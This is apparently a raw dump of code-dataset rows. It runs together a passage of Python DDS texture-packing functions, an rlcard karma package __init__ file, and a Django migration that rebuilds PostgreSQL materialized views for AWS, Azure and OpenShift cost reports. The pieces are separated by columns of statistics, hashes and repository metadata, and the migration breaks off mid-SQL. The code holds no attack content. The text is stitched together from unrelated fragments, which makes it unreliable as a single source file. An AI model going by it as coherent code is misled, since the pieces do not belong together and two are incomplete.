upa = unpacked
# convert to tuples for faster access
for i in range(len(scales)):
scales[i] = tuple(scales[i])
#loop for each texel
for txl_i in range(0, len(repacked), 2):
#cache so it doesn't have to keep being calculated
pxl_i = (txl_i>>2)*channels_per_texel
idx = 0
# figure out if we're packing red or green(1=red, 2=green)
chan = (((txl_i>>1)+1)%2)+1
scale = scales[chan]
vals = tuple(map(lambda i: scale[upa[pxl_i+i+chan]], pixel_indices))
val0 = max(vals)
val1 = min(vals)
if val0 == val1:
# if they are the same number then
# the indexing can stay at all zero
pass
elif val1 and val0 != 255:
# if the most extreme values are NOT 0 or
# 255, use them as the interpolation values
# In this mode, value_0 must be greater than value_1
dif = val0 - val1
half_dif = dif//2
# calculate and store which interpolated
# index each value is closest to
for i in range(len(vals)):
# 0 = c_0 1 = c_1
# 2 = (6*c_0 + c_1)//7 3 = (5*c_0 + 2*c_1)//7
# 4 = (4*c_0 + 3*c_1)//7 5 = (3*c_0 + 4*c_1)//7
# 6 = (2*c_0 + 5*c_1)//7 7 = (c_0 + 6*c_1)//7
# calculate how far between both colors
# that the value is as a 0 to 7 int
tmp = ((vals[i] - val1)*7 + half_dif)//dif
if tmp == 0:
idx |= 1<<(i*3)
elif tmp < 7:
# Because the colors are stored in opposite
# order, we need to invert the index
idx |= (8-tmp)<<(i*3)
else:
# In this mode, value_0 must be less than or equal to value_1
# if the most extreme values ARE 0 and 255 though, then
# we need to calculate the second most extreme values
val0 = 255
val1 = 0
for val in vals:
# store if lowest int so far
if val < val0 and val: val0 = val
# store if greatest int so far
if val > val1 and val != 255: val1 = val
if val1:
dif = val1 - val0
else:
val0 = dif = 0
val1 = 255
half_dif = dif//2
# calculate and store which interpolated
# index each value is closest to
for i in range(len(vals)):
# there are 4 interpolated colors in this mode
# 0 = c_0 1 = c_1
# 2 = (4*c_0 + c_1)//5 3 = (3*c_0 + 2*c_1)//5
# 4 = (2*c_0 + 3*c_1)//5 5 = (c_0 + 4*c_1)//5
# 6 = 0 7 = 255
comp = vals[i]
if comp == 0:
# if the value is 0 we set it to index 6
idx |= 6<<(i*3)
elif comp == 255:
# if the value is 255 we set it to index 7
idx |= 7<<(i*3)
elif dif:
# calculate how far between both colors
# that the value is as a 0 to 5 int
tmp = ((comp - val0)*5 + half_dif)//dif
if tmp == 5:
idx |= 1<<(i*3)
elif tmp > 0:
idx |= (tmp+1)<<(i*3)
rpa[txl_i] = ((idx<<16) | (val1<<8) | val0)&0xFFffFFff
rpa[txl_i+1] = idx>>16
return repacked
def pack_ctx1(arby, unpacked, width, height, depth=1):
width, height, depth = ab.clip_dimensions(width, height, depth)
dxt_width, dxt_height = clip_dxt_dimensions(width, height)
texel_width, texel_height, _ = ab.clip_dimensions(dxt_width//4, dxt_height//4)
#create a new array to hold the texels after we repack them
bpt = 8
ucc = arby.unpacked_channel_count
repacked = ab.bitmap_io.make_array("I", texel_width*texel_height, bpt)
unpacked = swizzle_dxt(unpacked, width, height * depth, ucc)
_, r_scale, g_scale, __ = arby.channel_downscalers
pixels_per_texel = get_texel_pixel_count(width, height)
channels_per_texel = ucc*pixels_per_texel
pixel_indices = range(0, channels_per_texel, ucc)
if False and fast_dds_defs:
# NOT IMPLEMENTED
dds_defs_ext.pack_ctx1(repacked, unpacked, r_scale, g_scale,
pixels_per_texel)
return repacked
#shorthand names
rpa = repacked
upa = unpacked
# convert to tuples for faster access
r_scale, g_scale = tuple(r_scale), tuple(g_scale)
#loop for each texel
for txl_i in range(0, len(repacked), 2):
dist0 = dist1 = c_0i = c_1i = idx = 0
xy_0 = [0,0,0,0]
xy_1 = [0,0,0,0]
xy_2 = [0,0,0,0]
xy_3 = [0,0,0,0]
#cache so it doesn't have to keep being calculated
pxl_i = (txl_i//2)*channels_per_texel
r_pxl_i = pxl_i + 1
g_pxl_i = pxl_i + 2
# compare distance between all pixels and find the two furthest apart
#(we are actually comparing the area of the distance as it's faster)
for i in pixel_indices:
for j in pixel_indices:
if j <= i: continue
dist1 = ((upa[r_pxl_i + i] - upa[r_pxl_i + j])**2 +
(upa[g_pxl_i + i] - upa[g_pxl_i + j])**2)
if dist1 > dist0:
dist0 = dist1
c_0i = i
c_1i = j
# store furthest apart colors for use
xy_0[0] = r_scale[upa[r_pxl_i + c_0i]]
xy_0[1] = g_scale[upa[g_pxl_i + c_0i]]
xy_1[0] = r_scale[upa[r_pxl_i + c_1i]]
xy_1[1] = g_scale[upa[g_pxl_i + c_1i]]
color0 = xy_0[0] | (xy_0[1]<<8)
color1 = xy_1[0] | (xy_1[1]<<8)
rpa[txl_i] = color0 | (color1<<16)
if color0 != color1:
# calculate the intermediate colors
xy_2[0] = (xy_0[0]*2 + xy_1[0])//3
xy_2[1] = (xy_0[1]*2 + xy_1[1])//3
xy_3[0] = (xy_0[0] + xy_1[0]*2)//3
xy_3[1] = (xy_0[1] + xy_1[1]*2)//3
# calculate each pixel's closest match
# and assign it the proper index
for i in pixel_indices:
x = r_scale[upa[r_pxl_i + i]]
y = g_scale[upa[g_pxl_i + i]]
dist0 = (x-xy_0[0])**2 + (y-xy_0[1])**2
dist1 = (x-xy_1[0])**2 + (y-xy_1[1])**2
# add appropriate indexing value to array
if dist0 <= dist1: #closer to color 0
if dist0 > (x-xy_2[0])**2 + (y-xy_2[1])**2:
#closest to color 2
idx |= 2<<(i//2)
elif dist1 < (x-xy_3[0])**2 + (y-xy_3[1])**2:
#closest to color 1
idx |= 1<<(i//2)
else: #closest to color 3
idx |= 3<<(i//2)
rpa[txl_i+1] = idx
return repacked
def pack_v8u8(arby, unpacked, width, height, depth=1):
return pack_vu(arby, unpacked, width, height, depth, 8)
def pack_v16u16(arby, unpacked, width, height, depth=1):
return pack_vu(arby, unpacked, width, height, depth, 16)
def pack_vu(arby, unpacked, width, height, depth=1, bpc=8):
ucc = arby.unpacked_channel_count
if ucc < 2:
raise TypeError("Cannot convert image with less than 2 channels "
"to V%sU%s." % (bpc, bpc))
bytes_per_pixel = (bpc * 2)//8
typecode = ab.INVERSE_PIXEL_ENCODING_SIZES[bytes_per_pixel]
packed = ab.bitmap_io.make_array(typecode, len(unpacked)//ucc)
_, u_scale, v_scale, __ = arby.channel_downscalers
if ucc == 2:
chan0, chan1 = 0, 1
else:
chan0, chan1 = 1, 2
if fast_dds_defs:
dds_defs_ext.pack_vu(packed, unpacked, u_scale, v_scale,
ucc, chan0, chan1)
return packed
# convert to tuples for faster access
u_scale, v_scale = tuple(u_scale), tuple(v_scale)
sign_mask = 1 << (bpc - 1)
sign_mask = sign_mask + (sign_mask << bpc)
for i in range(0, len(unpacked), ucc):
# RGB normal maps use unsigned chars, which maps to:
# [0, 255] -> [-1, 1]
# V8U8 uses signed chars, which maps(as unsigned chars) to:
# [0, 127] -> [+0, 1] and [128, 255] -> [-1, -0]
# Ones compliment is used here to simplify math and to allow
# all components to have a zero point and to make both sides
# of the zero point have an equal numbers of points.
packed[i//ucc] = (((v_scale[unpacked[i + chan1]]<<bpc) |
u_scale[unpacked[i + chan0]])^sign_mask)
return packed
def pack_r8g8(arby, unpacked, width, height, depth=1):
return pack_rg(arby, unpacked, width, height, depth, 8)
def pack_r16g16(arby, unpacked, width, height, depth=1):
return pack_rg(arby, unpacked, width, height, depth, 16)
def pack_rg(arby, unpacked, width, height, depth=1, bpc=8):
ucc = arby.unpacked_channel_count
if ucc < 2:
raise TypeError("Cannot convert image with less than 2 channels "
"to R%sG%s." % (bpc, bpc))
bytes_per_pixel = (bpc * 2)//8
typecode = ab.INVERSE_PIXEL_ENCODING_SIZES[bytes_per_pixel]
packed = ab.bitmap_io.make_array(typecode, len(unpacked)//ucc)
_, r_scale, g_scale, __ = arby.channel_downscalers
if ucc == 2:
chan0, chan1 = 0, 1
else:
chan0, chan1 = 1, 2
if False and fast_dds_defs:
# NOT IMPLEMENTED YET
dds_defs_ext.pack_rg(packed, unpacked, r_scale, g_scale,
ucc, chan0, chan1)
return packed
# convert to tuples for faster access
r_scale, g_scale = tuple(r_scale), tuple(g_scale)
for i in range(0, len(unpacked), ucc):
packed[i//ucc] = ((g_scale[unpacked[i + chan1]]<<bpc) |
r_scale[unpacked[i + chan0]])
return packed
def pack_g8b8(arby, unpacked, width, height, depth=1):
return pack_gb(arby, unpacked, width, height, depth, 8)
def pack_g16b16(arby, unpacked, width, height, depth=1):
return pack_gb(arby, unpacked, width, height, depth, 16)
def pack_gb(arby, unpacked, width, height, depth=1, bpc=8):
ucc = arby.unpacked_channel_count
if ucc < 2:
raise TypeError("Cannot convert image with less than 2 channels "
"to G%sB%s." % (bpc, bpc))
bytes_per_pixel = (bpc * 2)//8
typecode = ab.INVERSE_PIXEL_ENCODING_SIZES[bytes_per_pixel]
packed = ab.bitmap_io.make_array(typecode, len(unpacked)//ucc)
_, __, g_scale, b_scale = arby.channel_downscalers
if ucc == 2:
chan0, chan1 = 0, 1
else:
chan0, chan1 = 1, 2
if False and fast_dds_defs:
# NOT IMPLEMENTED YET
dds_defs_ext.pack_gb(packed, unpacked, g_scale, b_scale,
ucc, chan0, chan1)
return packed
# convert to tuples for faster access
g_scale, b_scale = tuple(g_scale), tuple(b_scale)
for i in range(0, len(unpacked), ucc):
packed[i//ucc] = ((b_scale[unpacked[i + chan1]]<<bpc) |
g_scale[unpacked[i + chan0]])
return packed
| 37.586967
| 86
| 0.544988
| 11,704
| 78,444
| 3.445745
| 0.03973
| 0.006794
| 0.034516
| 0.003967
| 0.841404
| 0.822758
| 0.797615
| 0.786928
| 0.773736
| 0.758908
| 0
| 0.065708
| 0.339401
| 78,444
| 2,086
| 87
| 37.604986
| 0.712543
| 0.156086
| 0
| 0.701578
| 0
| 0
| 0.004563
| 0
| 0
| 0
| 0.001795
| 0
| 0.007174
| 1
| 0.028694
| false
| 0.002152
| 0.002152
| 0.011478
| 0.068149
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e3db544d00fdc6c70c12fb95341cd366373d1301
| 293
|
py
|
Python
|
rlcard/games/karma/__init__.py
|
pettaa123/rlcard
|
f5b98eb3a836406ee51197728a258c834959ddb3
|
[
"MIT"
] | null | null | null |
rlcard/games/karma/__init__.py
|
pettaa123/rlcard
|
f5b98eb3a836406ee51197728a258c834959ddb3
|
[
"MIT"
] | null | null | null |
rlcard/games/karma/__init__.py
|
pettaa123/rlcard
|
f5b98eb3a836406ee51197728a258c834959ddb3
|
[
"MIT"
] | null | null | null |
from rlcard.games.karma.dealer import KarmaDealer as Dealer
#from rlcard.games.karma.judger import KarmaJudger as Judger
from rlcard.games.karma.player import KarmaPlayer as Player
from rlcard.games.karma.round import KarmaRound as Round
from rlcard.games.karma.game import KarmaGame as Game
| 41.857143
| 60
| 0.83959
| 45
| 293
| 5.466667
| 0.355556
| 0.203252
| 0.304878
| 0.406504
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.105802
| 293
| 6
| 61
| 48.833333
| 0.938931
| 0.201365
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
e3e68fd9d9c3aa2c6b00ad9648fa8ab13795b588
| 28,481
|
py
|
Python
|
koku/reporting/migrations/0100_aws_azure_query_perforance.py
|
Vasyka/koku
|
b5aa9ec41c3b0821e74afe9ff3a5ffaedb910614
|
[
"Apache-2.0"
] | 2
|
2022-01-12T03:42:39.000Z
|
2022-01-12T03:42:40.000Z
|
koku/reporting/migrations/0100_aws_azure_query_perforance.py
|
Vasyka/koku
|
b5aa9ec41c3b0821e74afe9ff3a5ffaedb910614
|
[
"Apache-2.0"
] | null | null | null |
koku/reporting/migrations/0100_aws_azure_query_perforance.py
|
Vasyka/koku
|
b5aa9ec41c3b0821e74afe9ff3a5ffaedb910614
|
[
"Apache-2.0"
] | 1
|
2021-07-21T09:33:59.000Z
|
2021-07-21T09:33:59.000Z
|
# Generated by Django 2.2.10 on 2020-02-28 17:34
import django.contrib.postgres.indexes
from django.db import migrations
from django.db import models
class Migration(migrations.Migration):
dependencies = [("reporting", "0099_ocp_performance")]
operations = [
migrations.RunSQL(
# Got to drop these views as we are changing the type of a selected column
# They will be recreated below
sql="""
DROP INDEX IF EXISTS aws_cost_summary;
DROP MATERIALIZED VIEW IF EXISTS reporting_aws_cost_summary;
DROP INDEX IF EXISTS aws_cost_summary_service;
DROP MATERIALIZED VIEW IF EXISTS reporting_aws_cost_summary_by_service;
DROP INDEX IF EXISTS aws_cost_summary_account;
DROP MATERIALIZED VIEW IF EXISTS reporting_aws_cost_summary_by_account;
DROP INDEX IF EXISTS aws_cost_summary_region;
DROP MATERIALIZED VIEW IF EXISTS reporting_aws_cost_summary_by_region;
DROP INDEX IF EXISTS aws_storage_summary;
DROP MATERIALIZED VIEW IF EXISTS reporting_aws_storage_summary;
DROP INDEX IF EXISTS aws_storage_summary_service;
DROP MATERIALIZED VIEW IF EXISTS reporting_aws_storage_summary_by_service;
DROP INDEX IF EXISTS aws_storage_summary_account;
DROP MATERIALIZED VIEW IF EXISTS reporting_aws_storage_summary_by_account;
DROP INDEX IF EXISTS aws_storage_summary_region;
DROP MATERIALIZED VIEW IF EXISTS reporting_aws_storage_summary_by_region;
DROP INDEX IF EXISTS aws_network_summary;
DROP MATERIALIZED VIEW IF EXISTS reporting_aws_network_summary;
DROP INDEX IF EXISTS aws_database_summary;
DROP MATERIALIZED VIEW IF EXISTS reporting_aws_database_summary;
DROP INDEX IF EXISTS ocpallcstdlysumm_node;
DROP INDEX IF EXISTS ocpallcstdlysumm_node_like;
DROP INDEX IF EXISTS ocpallcstdlysumm_nsp;
DROP MATERIALIZED VIEW IF EXISTS reporting_ocpallcostlineitem_daily_summary;
DROP INDEX IF EXISTS ocpallcstprjdlysumm_node;
DROP INDEX IF EXISTS ocpallcstprjdlysumm_nsp;
DROP INDEX IF EXISTS ocpallcstprjdlysumm_node_like;
DROP INDEX IF EXISTS ocpallcstprjdlysumm_nsp_like;
DROP MATERIALIZED VIEW IF EXISTS reporting_ocpallcostlineitem_project_daily_summary;
DROP INDEX IF EXISTS aws_compute_summary;
DROP MATERIALIZED VIEW IF EXISTS reporting_aws_compute_summary;
DROP INDEX IF EXISTS aws_compute_summary_service;
DROP MATERIALIZED VIEW IF EXISTS reporting_aws_compute_summary_by_service;
DROP INDEX IF EXISTS aws_compute_summary_region;
DROP MATERIALIZED VIEW IF EXISTS reporting_aws_compute_summary_by_region;
DROP INDEX IF EXISTS aws_compute_summary_account;
DROP MATERIALIZED VIEW IF EXISTS reporting_aws_compute_summary_by_account;
"""
),
migrations.AlterField(
model_name="awscostentrylineitemdaily", name="usage_end", field=models.DateField(null=True)
),
migrations.AlterField(model_name="awscostentrylineitemdaily", name="usage_start", field=models.DateField()),
migrations.AlterField(
model_name="awscostentrylineitemdailysummary", name="usage_end", field=models.DateField(null=True)
),
migrations.AlterField(
model_name="awscostentrylineitemdailysummary", name="usage_start", field=models.DateField()
),
migrations.AlterField(
model_name="azurecostentrylineitemdailysummary", name="usage_end", field=models.DateField(null=True)
),
migrations.AlterField(
model_name="azurecostentrylineitemdailysummary", name="usage_start", field=models.DateField()
),
migrations.AlterField(model_name="ocpawscostlineitemdailysummary", name="usage_end", field=models.DateField()),
migrations.AlterField(
model_name="ocpawscostlineitemdailysummary", name="usage_start", field=models.DateField()
),
migrations.AlterField(model_name="ocpnodelabellineitemdaily", name="usage_end", field=models.DateField()),
migrations.AlterField(model_name="ocpnodelabellineitemdaily", name="usage_start", field=models.DateField()),
migrations.AddIndex(
model_name="awscostentrylineitemdaily",
index=django.contrib.postgres.indexes.GinIndex(fields=["tags"], name="aws_cost_entry"),
),
migrations.AddIndex(
model_name="awscostentrylineitemdaily",
index=django.contrib.postgres.indexes.GinIndex(
fields=["product_code"], name="aws_cost_pcode_like", opclasses=["gin_trgm_ops"]
),
),
migrations.AddIndex(
model_name="awscostentrylineitemdailysummary",
index=django.contrib.postgres.indexes.GinIndex(
fields=["product_code"], name="aws_summ_usage_pcode_like", opclasses=["gin_trgm_ops"]
),
),
migrations.AddIndex(
model_name="awscostentrylineitemdailysummary",
index=django.contrib.postgres.indexes.GinIndex(
fields=["product_family"], name="aws_summ_usage_pfam_like", opclasses=["gin_trgm_ops"]
),
),
migrations.AddIndex(
model_name="ocpnodelabellineitemdaily",
index=models.Index(fields=["usage_start"], name="ocplblnitdly_usage_start"),
),
migrations.AddIndex(
model_name="ocpnodelabellineitemdaily",
index=django.contrib.postgres.indexes.GinIndex(fields=["node_labels"], name="ocplblnitdly_node_labels"),
),
migrations.AlterField(
model_name="azurecostentrylineitemdaily", name="usage_date_time", field=models.DateField(null=False)
),
migrations.RenameField(
model_name="azurecostentrylineitemdaily", old_name="usage_date_time", new_name="usage_date"
),
migrations.RunSQL(
sql="""
CREATE MATERIALIZED VIEW reporting_aws_cost_summary AS(
SELECT row_number() OVER(ORDER BY date(usage_start)) as id,
date(usage_start) as usage_start,
date(usage_start) as usage_end,
sum(unblended_cost) as unblended_cost,
sum(markup_cost) as markup_cost,
max(currency_code) as currency_code
FROM reporting_awscostentrylineitem_daily_summary
-- Get data for this month or last month
WHERE usage_start >= DATE_TRUNC('month', NOW() - '1 month'::interval)::date
GROUP BY date(usage_start)
)
;
CREATE UNIQUE INDEX aws_cost_summary
ON reporting_aws_cost_summary (usage_start)
;
CREATE MATERIALIZED VIEW reporting_aws_cost_summary_by_service AS(
SELECT row_number() OVER(ORDER BY date(usage_start), product_code, product_family) as id,
date(usage_start) as usage_start,
date(usage_start) as usage_end,
product_code,
product_family,
sum(unblended_cost) as unblended_cost,
sum(markup_cost) as markup_cost,
max(currency_code) as currency_code
FROM reporting_awscostentrylineitem_daily_summary
-- Get data for this month or last month
WHERE usage_start >= DATE_TRUNC('month', NOW() - '1 month'::interval)::date
GROUP BY date(usage_start), product_code, product_family
)
;
CREATE UNIQUE INDEX aws_cost_summary_service
ON reporting_aws_cost_summary_by_service (usage_start, product_code, product_family)
;
CREATE MATERIALIZED VIEW reporting_aws_cost_summary_by_account AS(
SELECT row_number() OVER(ORDER BY date(usage_start), usage_account_id, account_alias_id) as id,
date(usage_start) as usage_start,
date(usage_start) as usage_end,
usage_account_id,
account_alias_id,
sum(unblended_cost) as unblended_cost,
sum(markup_cost) as markup_cost,
max(currency_code) as currency_code
FROM reporting_awscostentrylineitem_daily_summary
-- Get data for this month or last month
WHERE usage_start >= DATE_TRUNC('month', NOW() - '1 month'::interval)::date
GROUP BY date(usage_start), usage_account_id, account_alias_id
)
;
CREATE UNIQUE INDEX aws_cost_summary_account
ON reporting_aws_cost_summary_by_account (usage_start, usage_account_id, account_alias_id)
;
CREATE MATERIALIZED VIEW reporting_aws_cost_summary_by_region AS(
SELECT row_number() OVER(ORDER BY date(usage_start), region, availability_zone) as id,
date(usage_start) as usage_start,
date(usage_start) as usage_end,
region,
availability_zone,
sum(unblended_cost) as unblended_cost,
sum(markup_cost) as markup_cost,
max(currency_code) as currency_code
FROM reporting_awscostentrylineitem_daily_summary
-- Get data for this month or last month
WHERE usage_start >= DATE_TRUNC('month', NOW() - '1 month'::interval)::date
GROUP BY date(usage_start), region, availability_zone
)
;
CREATE UNIQUE INDEX aws_cost_summary_region
ON reporting_aws_cost_summary_by_region (usage_start, region, availability_zone)
;
CREATE MATERIALIZED VIEW reporting_aws_storage_summary AS(
SELECT row_number() OVER(ORDER BY date(usage_start), product_family) as id,
date(usage_start) as usage_start,
date(usage_start) as usage_end,
product_family,
sum(usage_amount) as usage_amount,
max(unit) as unit,
sum(unblended_cost) as unblended_cost,
sum(markup_cost) as markup_cost,
max(currency_code) as currency_code
FROM reporting_awscostentrylineitem_daily_summary
-- Get data for this month or last month
WHERE product_family LIKE '%Storage%'
AND unit = 'GB-Mo'
AND usage_start >= DATE_TRUNC('month', NOW() - '1 month'::interval)::date
GROUP BY date(usage_start), product_family
)
;
CREATE UNIQUE INDEX aws_storage_summary
ON reporting_aws_storage_summary (usage_start, product_family)
;
CREATE MATERIALIZED VIEW reporting_aws_storage_summary_by_service AS(
SELECT row_number() OVER(ORDER BY date(usage_start), product_code, product_family) as id,
date(usage_start) as usage_start,
date(usage_start) as usage_end,
product_code,
product_family,
sum(usage_amount) as usage_amount,
max(unit) as unit,
sum(unblended_cost) as unblended_cost,
sum(markup_cost) as markup_cost,
max(currency_code) as currency_code
FROM reporting_awscostentrylineitem_daily_summary
-- Get data for this month or last month
WHERE product_family LIKE '%Storage%'
AND unit = 'GB-Mo'
AND usage_start >= DATE_TRUNC('month', NOW() - '1 month'::interval)::date
GROUP BY date(usage_start), product_code, product_family
)
;
CREATE UNIQUE INDEX aws_storage_summary_service
ON reporting_aws_storage_summary_by_service (usage_start, product_code, product_family)
;
CREATE MATERIALIZED VIEW reporting_aws_storage_summary_by_account AS(
SELECT row_number() OVER(ORDER BY date(usage_start), usage_account_id, account_alias_id, product_family) as id,
date(usage_start) as usage_start,
date(usage_start) as usage_end,
usage_account_id,
account_alias_id,
product_family,
sum(usage_amount) as usage_amount,
max(unit) as unit,
sum(unblended_cost) as unblended_cost,
sum(markup_cost) as markup_cost,
max(currency_code) as currency_code
FROM reporting_awscostentrylineitem_daily_summary
-- Get data for this month or last month
WHERE product_family LIKE '%Storage%'
AND unit = 'GB-Mo'
AND usage_start >= DATE_TRUNC('month', NOW() - '1 month'::interval)::date
GROUP BY date(usage_start), usage_account_id, account_alias_id, product_family
)
;
CREATE UNIQUE INDEX aws_storage_summary_account
ON reporting_aws_storage_summary_by_account (usage_start, usage_account_id, account_alias_id, product_family)
;
CREATE MATERIALIZED VIEW reporting_aws_storage_summary_by_region AS(
SELECT row_number() OVER(ORDER BY date(usage_start), region, availability_zone, product_family) as id,
date(usage_start) as usage_start,
date(usage_start) as usage_end,
region,
availability_zone,
product_family,
sum(usage_amount) as usage_amount,
max(unit) as unit,
sum(unblended_cost) as unblended_cost,
sum(markup_cost) as markup_cost,
max(currency_code) as currency_code
FROM reporting_awscostentrylineitem_daily_summary
-- Get data for this month or last month
WHERE product_family LIKE '%Storage%'
AND unit = 'GB-Mo'
AND usage_start >= DATE_TRUNC('month', NOW() - '1 month'::interval)::date
GROUP BY date(usage_start), region, availability_zone, product_family
)
;
CREATE UNIQUE INDEX aws_storage_summary_region
ON reporting_aws_storage_summary_by_region (usage_start, region, availability_zone, product_family)
;
CREATE MATERIALIZED VIEW reporting_aws_network_summary AS(
SELECT row_number() OVER(ORDER BY date(usage_start), product_code) as id,
date(usage_start) as usage_start,
date(usage_start) as usage_end,
product_code,
sum(usage_amount) as usage_amount,
max(unit) as unit,
sum(unblended_cost) as unblended_cost,
sum(markup_cost) as markup_cost,
max(currency_code) as currency_code
FROM reporting_awscostentrylineitem_daily_summary
-- Get data for this month or last month
WHERE product_code IN ('AmazonVPC','AmazonCloudFront','AmazonRoute53','AmazonAPIGateway')
AND usage_start >= DATE_TRUNC('month', NOW() - '1 month'::interval)::date
GROUP BY date(usage_start), product_code
)
;
CREATE UNIQUE INDEX aws_network_summary
ON reporting_aws_network_summary (usage_start, product_code)
;
CREATE MATERIALIZED VIEW reporting_aws_database_summary AS(
SELECT row_number() OVER(ORDER BY date(usage_start), product_code) as id,
date(usage_start) as usage_start,
date(usage_start) as usage_end,
product_code,
sum(usage_amount) as usage_amount,
max(unit) as unit,
sum(unblended_cost) as unblended_cost,
sum(markup_cost) as markup_cost,
max(currency_code) as currency_code
FROM reporting_awscostentrylineitem_daily_summary
-- Get data for this month or last month
WHERE product_code IN ('AmazonRDS','AmazonDynamoDB','AmazonElastiCache','AmazonNeptune','AmazonRedshift','AmazonDocumentDB')
AND usage_start >= DATE_TRUNC('month', NOW() - '1 month'::interval)::date
GROUP BY date(usage_start), product_code
)
;
CREATE UNIQUE INDEX aws_database_summary
ON reporting_aws_database_summary (usage_start, product_code)
;
CREATE MATERIALIZED VIEW reporting_ocpallcostlineitem_daily_summary AS (
SELECT row_number() OVER () as id,
lids.*
FROM (
SELECT 'AWS' as source_type,
cluster_id,
cluster_alias,
namespace,
node::text as node,
resource_id,
usage_start,
usage_end,
usage_account_id,
account_alias_id,
product_code,
product_family,
instance_type,
region,
availability_zone,
tags,
usage_amount,
unit,
unblended_cost,
markup_cost,
currency_code,
shared_projects,
project_costs
FROM reporting_ocpawscostlineitem_daily_summary
WHERE usage_start >= DATE_TRUNC('month', NOW() - '1 month'::interval)::date
UNION
SELECT 'Azure' as source_type,
cluster_id,
cluster_alias,
namespace,
node::text as node,
resource_id,
usage_start,
usage_end,
subscription_guid as usage_account_id,
NULL::int as account_alias_id,
service_name as product_code,
NULL as product_family,
instance_type,
resource_location as region,
NULL as availability_zone,
tags,
usage_quantity as usage_amount,
unit_of_measure as unit,
pretax_cost as unblended_cost,
markup_cost,
currency as currency_code,
shared_projects,
project_costs
FROM reporting_ocpazurecostlineitem_daily_summary
WHERE usage_start >= DATE_TRUNC('month', NOW() - '1 month'::interval)::date
) AS lids
)
;
CREATE INDEX ocpallcstdlysumm_node on reporting_ocpallcostlineitem_daily_summary (node text_pattern_ops);
CREATE INDEX ocpallcstdlysumm_node_like on reporting_ocpallcostlineitem_daily_summary USING GIN (node gin_trgm_ops);
CREATE index ocpallcstdlysumm_nsp on reporting_ocpallcostlineitem_daily_summary USING GIN (namespace);
CREATE MATERIALIZED VIEW reporting_ocpallcostlineitem_project_daily_summary AS (
SELECT row_number() OVER () as id,
lids.*
FROM (
SELECT 'AWS' as source_type,
cluster_id,
cluster_alias,
data_source,
namespace::text as namespace,
node::text as node,
pod_labels,
resource_id,
usage_start,
usage_end,
usage_account_id,
account_alias_id,
product_code,
product_family,
instance_type,
region,
availability_zone,
usage_amount,
unit,
unblended_cost,
project_markup_cost,
pod_cost,
currency_code
FROM reporting_ocpawscostlineitem_project_daily_summary
WHERE usage_start >= DATE_TRUNC('month', NOW() - '1 month'::interval)::date
UNION
SELECT 'Azure' as source_type,
cluster_id,
cluster_alias,
data_source,
namespace::text as namespace,
node::text as node,
pod_labels,
resource_id,
usage_start,
usage_end,
subscription_guid as usage_account_id,
NULL::int as account_alias_id,
service_name as product_code,
NULL as product_family,
instance_type,
resource_location as region,
NULL as availability_zone,
usage_quantity as usage_amount,
unit_of_measure as unit,
pretax_cost as unblended_cost,
project_markup_cost,
pod_cost,
currency as currency_code
FROM reporting_ocpazurecostlineitem_project_daily_summary
WHERE usage_start >= DATE_TRUNC('month', NOW() - '1 month'::interval)::date
) AS lids
)
;
CREATE INDEX ocpallcstprjdlysumm_node on reporting_ocpallcostlineitem_project_daily_summary (node text_pattern_ops);
CREATE index ocpallcstprjdlysumm_nsp on reporting_ocpallcostlineitem_project_daily_summary (namespace text_pattern_ops);
CREATE INDEX ocpallcstprjdlysumm_node_like on reporting_ocpallcostlineitem_project_daily_summary USING GIN (node gin_trgm_ops);
CREATE index ocpallcstprjdlysumm_nsp_like on reporting_ocpallcostlineitem_project_daily_summary USING GIN (namespace gin_trgm_ops);
CREATE MATERIALIZED VIEW reporting_aws_compute_summary AS(
SELECT ROW_NUMBER() OVER(ORDER BY c.usage_start, c.instance_type) AS id,
c.usage_start,
c.usage_start as usage_end,
c.instance_type,
r.resource_ids,
CARDINALITY(r.resource_ids) AS resource_count,
c.usage_amount,
c.unit,
c.unblended_cost,
c.markup_cost,
c.currency_code
FROM (
-- this group by gets the counts
SELECT usage_start,
instance_type,
SUM(usage_amount) AS usage_amount,
MAX(unit) AS unit,
SUM(unblended_cost) AS unblended_cost,
SUM(markup_cost) AS markup_cost,
MAX(currency_code) AS currency_code
FROM reporting_awscostentrylineitem_daily_summary
WHERE usage_start >= DATE_TRUNC('month', NOW() - '1 month'::interval)::date
AND instance_type IS NOT NULL
GROUP
BY usage_start,
instance_type
) AS c
JOIN (
-- this group by gets the distinct resources running by day
SELECT usage_start,
instance_type,
ARRAY_AGG(DISTINCT resource_id ORDER BY resource_id) as resource_ids
FROM (
SELECT usage_start,
instance_type,
UNNEST(resource_ids) AS resource_id
FROM reporting_awscostentrylineitem_daily_summary
WHERE usage_start >= DATE_TRUNC('month', NOW() - '1 month'::interval)::date
AND instance_type IS NOT NULL
) AS x
GROUP
BY usage_start,
instance_type
) AS r
ON c.usage_start = r.usage_start
AND c.instance_type = r.instance_type
)
WITH DATA
;
CREATE UNIQUE INDEX aws_compute_summary
ON reporting_aws_compute_summary (usage_start, instance_type)
;
CREATE MATERIALIZED VIEW reporting_aws_compute_summary_by_service AS(
SELECT ROW_NUMBER() OVER(ORDER BY c.usage_start, c.product_code, c.product_family, c.instance_type) AS id,
c.usage_start,
c.usage_start as usage_end,
c.product_code,
c.product_family,
c.instance_type,
r.resource_ids,
CARDINALITY(r.resource_ids) AS resource_count,
c.usage_amount,
c.unit,
c.unblended_cost,
c.markup_cost,
c.currency_code
FROM (
-- this group by gets the counts
SELECT usage_start,
product_code,
product_family,
instance_type,
SUM(usage_amount) AS usage_amount,
MAX(unit) AS unit,
SUM(unblended_cost) AS unblended_cost,
SUM(markup_cost) AS markup_cost,
MAX(currency_code) AS currency_code
FROM reporting_awscostentrylineitem_daily_summary
